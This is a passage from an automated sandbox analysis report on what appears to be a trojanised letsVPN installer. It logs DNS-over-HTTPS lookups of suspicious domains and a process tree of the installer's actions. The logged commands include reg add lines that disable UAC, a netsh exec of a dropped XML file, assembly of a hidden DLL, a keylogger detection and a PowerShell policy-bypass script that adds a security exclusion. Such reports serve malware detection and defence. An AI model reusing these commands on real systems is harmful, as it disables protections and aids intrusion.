Expires: Sun, 29 Dec 2024 15:30:25 GMT
Cache-Control: private, max-age=5
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 3df0c7f0100d83e321104aebfb371f70.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: BAH53-C1
X-Amz-Cf-Id: cGLEGIhL8GLCxNG5IaKoXi8rwh2uRfvZkxsULBLtBc3_WzV30MEWmg==
2024-12-29 15:30:25 UTC | 604 | IN | Data Ascii: 255{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"nit.crash1ytics.com.","type":1}],"Answer":[{"name":"nit.crash1ytics.com.","type":1,"TTL":5,"data":"19.88.16.251"},{"name":"nit.crash1ytics.com.","type":1,"TTL":5,"d
2024-12-29 15:30:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49880 | 13.227.9.159 | 443 | 2448 | C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-29 15:30:24 UTC | 180 | OUT | GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nal.fqoqehwib.com.&type=1 HTTP/1.1
Host: d1dmgcawtbm6l9.cloudfront.net
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
2024-12-29 15:30:25 UTC | 676 | IN | HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Server: nginx/1.16.0
Date: Sun, 29 Dec 2024 15:30:25 GMT
Accept-Ranges: none
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Expires: Sun, 29 Dec 2024 15:30:25 GMT
Cache-Control: private, max-age=1
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 6875e0a7bd9edbe1e31cf13567cf2626.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: BAH53-C1
X-Amz-Cf-Id: J3Ip5NKHUSlM2u83Vk4Ne6dzAlgt4QEXdV2plvdmXEy2YQ1_CRQL9w==
2024-12-29 15:30:25 UTC | 660 | IN | Data Ascii: 28d{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"nal.fqoqehwib.com.","type":1}],"Answer":[{"name":"nal.fqoqehwib.com.","type":1,"TTL":1,"data":"200.200.101.91"},{"name":"nal.fqoqehwib.com.","type":1,"TTL":1,"data"
2024-12-29 15:30:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49881 | 13.227.9.159 | 443 | 2448 | C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-29 15:30:24 UTC | 183 | OUT | GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=chr.alipayassets.com.&type=1 HTTP/1.1
                                                                                                                                                                                                  Host: d1dmgcawtbm6l9.cloudfront.net
                                                                                                                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                                                                                                                  Accept-Encoding: gzip
2024-12-29 15:30:25 UTC | 676 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Server: nginx/1.16.0
                                                                                                                                                                                                  Date: Sun, 29 Dec 2024 15:30:25 GMT
                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Expires: Sun, 29 Dec 2024 15:30:25 GMT
                                                                                                                                                                                                  Cache-Control: private, max-age=3
                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                  Via: 1.1 9d372a5e3796d0e47e0033a1ec2335c4.cloudfront.net (CloudFront)
                                                                                                                                                                                                  X-Amz-Cf-Pop: BAH53-C1
                                                                                                                                                                                                  X-Amz-Cf-Id: TQVJjwHEEFVAWBz-xWFy0jLz3C6XtbqPa7VabZpDzrPpS-4IxHbEng==
2024-12-29 15:30:25 UTC | 465 | IN | Data Ascii: 1ca{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"chr.alipayassets.com.","type":1}],"Answer":[{"name":"chr.alipayassets.com.","type":1,"TTL":3,"data":"129.180.217.138"},{"name":"chr.alipayassets.com.","type":1,"TTL
2024-12-29 15:30:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0



                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                  Start time:10:28:52
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\letsVPN.exe"
                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                  File size:33'128'448 bytes
                                                                                                                                                                                                  MD5 hash:EF0F5B020EA3238A98642CD7B56D84BB
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                  Start time:10:28:54
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ipconfig /all
                                                                                                                                                                                                  Imagebase:0x7ff7ba200000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                  Start time:10:28:54
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                  Start time:10:28:54
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:ipconfig /all
                                                                                                                                                                                                  Imagebase:0x7ff7c4af0000
                                                                                                                                                                                                  File size:35'840 bytes
                                                                                                                                                                                                  MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                  Start time:10:28:55
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\netsh.exe" exec C:\ProgramData\QqXF5.xml
                                                                                                                                                                                                  Imagebase:0x7ff6e4b80000
                                                                                                                                                                                                  File size:96'768 bytes
                                                                                                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                  Start time:10:29:01
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\b6Jzu.bat"
                                                                                                                                                                                                  Imagebase:0x7ff7ba200000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                  Start time:10:29:01
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                  Start time:10:29:01
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
                                                                                                                                                                                                  Imagebase:0x7ff6bca40000
                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                  Start time:10:29:01
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
                                                                                                                                                                                                  Imagebase:0x7ff6bca40000
                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                  Start time:10:29:01
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
                                                                                                                                                                                                  Imagebase:0x7ff6bca40000
                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                  Start time:10:29:02
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                  Start time:10:29:04
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\0zVlL\Jd0i4~16\s+C:\ProgramData\0zVlL\Jd0i4~16\a C:\ProgramData\0zVlL\Jd0i4~16\base.dll
                                                                                                                                                                                                  Imagebase:0x7ff7ba200000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                  Start time:10:29:04
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                  Start time:10:29:06
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\mmc.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\mmc.exe -Embedding
                                                                                                                                                                                                  Imagebase:0x7ff6c21a0000
                                                                                                                                                                                                  File size:1'953'280 bytes
                                                                                                                                                                                                  MD5 hash:58C9E5172C3708A6971CA0CBC80FE8B8
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                  Start time:10:29:08
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe"
                                                                                                                                                                                                  Imagebase:0x370000
                                                                                                                                                                                                  File size:258'328 bytes
                                                                                                                                                                                                  MD5 hash:68411B35F7B40B45AFC4A60A2681549D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                  Start time:10:29:09
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\mmc.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\mmc.exe -Embedding
                                                                                                                                                                                                  Imagebase:0x7ff6c21a0000
                                                                                                                                                                                                  File size:1'953'280 bytes
                                                                                                                                                                                                  MD5 hash:58C9E5172C3708A6971CA0CBC80FE8B8
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                  Start time:10:29:09
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\ProgramData\letsvpn-latest.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:15'511'576 bytes
                                                                                                                                                                                                  MD5 hash:9F5F358AA1A85D222AD967F4538BC753
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2513670746.000000000292A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                  Start time:10:29:10
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ipconfig /all
                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                  Start time:10:29:10
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                  Start time:10:29:11
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:ipconfig /all
                                                                                                                                                                                                  Imagebase:0xb40000
                                                                                                                                                                                                  File size:29'184 bytes
                                                                                                                                                                                                  MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                  Start time:10:29:44
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
                                                                                                                                                                                                  Imagebase:0xcd0000
                                                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                  Start time:10:29:44
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                  Start time:10:29:56
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
                                                                                                                                                                                                  Imagebase:0x7ff7132a0000
                                                                                                                                                                                                  File size:101'536 bytes
                                                                                                                                                                                                  MD5 hash:1E3CF83B17891AEE98C3E30012F0B034
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                  Start time:10:29:56
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                  Start time:10:29:57
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
                                                                                                                                                                                                  Imagebase:0x7ff7132a0000
                                                                                                                                                                                                  File size:101'536 bytes
                                                                                                                                                                                                  MD5 hash:1E3CF83B17891AEE98C3E30012F0B034
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                  Start time:10:29:57
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                  Start time:10:29:58
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
                                                                                                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

Target ID:33
Start time:10:29:58
Start date:29/12/2024
Path:C:\Windows\System32\drvinst.exe
Wow64 process (32bit):false
Commandline:DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\letsvpn\driver"
Imagebase:0x7ff76f850000
File size:337'920 bytes
MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:10:30:00
Start date:29/12/2024
Path:C:\Windows\System32\drvinst.exe
Wow64 process (32bit):false
Commandline:DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "000000000000011C"
Imagebase:0x7ff76f850000
File size:337'920 bytes
MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:10:30:00
Start date:29/12/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
Imagebase:0x7ff7e52b0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:10:30:01
Start date:29/12/2024
Path:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
Imagebase:0x7ff7132a0000
File size:101'536 bytes
MD5 hash:1E3CF83B17891AEE98C3E30012F0B034
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:10:30:01
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:10:30:02
Start date:29/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c netsh advfirewall firewall Delete rule name=lets
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:10:30:02
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:10:30:02
Start date:29/12/2024
Path:C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):true
Commandline:netsh advfirewall firewall Delete rule name=lets
Imagebase:0x1080000
File size:82'432 bytes
MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:10:30:02
Start date:29/12/2024
